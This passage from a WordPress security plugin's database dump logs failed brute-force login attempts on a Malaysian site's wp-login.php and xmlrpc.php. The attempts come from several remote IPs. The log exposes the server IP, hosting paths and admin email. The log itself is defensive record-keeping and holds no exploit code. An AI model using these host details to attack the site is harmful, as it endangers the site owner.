Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"23.226.131.177\";s:11:\"REMOTE_PORT\";s:5:\"51848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwQYMHMNng1AySUGyapOQAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567363168.4043\";s:12:\"REQUEST_TIME\";s:10:\"1567363168\";}}','notice','2019-09-01 18:39:29','2019-09-01 18:39:28',18204968,19504136,'https://bintara.com.my/xmlrpc.php',1,0,'23.226.131.177'),(23481,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"3.211.216.139\";s:11:\"REMOTE_PORT\";s:5:\"43856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwTd99YzdT54U4Mrp-pDAAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567363959.6357\";s:12:\"REQUEST_TIME\";s:10:\"1567363959\";}}','notice','2019-09-01 18:52:40','2019-09-01 18:52:39',17687840,19177752,'https://bintara.com.my/wp-login.php',1,0,'3.211.216.139'),(23482,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"3.211.216.139\";s:11:\"REMOTE_PORT\";s:5:\"44400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwTet9YzdT54U4Mrp-pDgAAAYo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567363962.4718\";s:12:\"REQUEST_TIME\";s:10:\"1567363962\";}}','notice','2019-09-01 18:52:43','2019-09-01 18:52:42',18204256,19500496,'https://bintara.com.my/xmlrpc.php',1,0,'3.211.216.139'),(23483,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"49784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwW7t9YzdT54U4Mrp-tAgAAAYw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567364846.542\";s:12:\"REQUEST_TIME\";s:10:\"1567364846\";}}','notice','2019-09-01 19:07:28','2019-09-01 19:07:26',17687840,19177488,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(23484,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"50300\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwW8d9YzdT54U4Mrp-tCQAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567364849.806\";s:12:\"REQUEST_TIME\";s:10:\"1567364849\";}}','notice','2019-09-01 19:07:31','2019-09-01 19:07:30',18204200,19500496,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(23485,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.142.192\";s:11:\"REMOTE_PORT\";s:5:\"36539\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwd3mje8g9YegPUhtOMIwAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567366622.6404\";s:12:\"REQUEST_TIME\";s:10:\"1567366622\";}}','notice','2019-09-01 19:37:03','2019-09-01 19:37:02',17688216,19178208,'https://bintara.com.my/wp-login.php',1,0,'37.187.142.192'),(23486,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.142.192\";s:11:\"REMOTE_PORT\";s:5:\"36722\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwd4d9YzdT54U4Mrp-0TAAAAYo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567366625.6325\";s:12:\"REQUEST_TIME\";s:10:\"1567366625\";}}','notice','2019-09-01 19:37:06','2019-09-01 19:37:05',18205088,19503864,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.142.192'),(23487,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-01 19:43:54','2019-09-01 19:43:51',17646032,18109456,'http://bintara.com.my/',1,0,'188.165.200.217'),(23488,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"122.128.111.232\";s:11:\"REMOTE_PORT\";s:5:\"54158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwgRTU4VuPOeWsfkg0dLQAAAQo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567367237.2765\";s:12:\"REQUEST_TIME\";s:10:\"1567367237\";}}','notice','2019-09-01 19:47:18','2019-09-01 19:47:17',17687768,19178640,'https://bintara.com.my/wp-login.php',1,0,'122.128.111.232'),(23489,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"122.128.111.232\";s:11:\"REMOTE_PORT\";s:5:\"54282\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWwgR1vRyrCg9V6axS2itQAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567367239.9652\";s:12:\"REQUEST_TIME\";s:10:\"1567367239\";}}','notice','2019-09-01 19:47:21','2019-09-01 19:47:20',18202920,19501024,'https://bintara.com.my/xmlrpc.php',1,0,'122.128.111.232'),(23490,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; 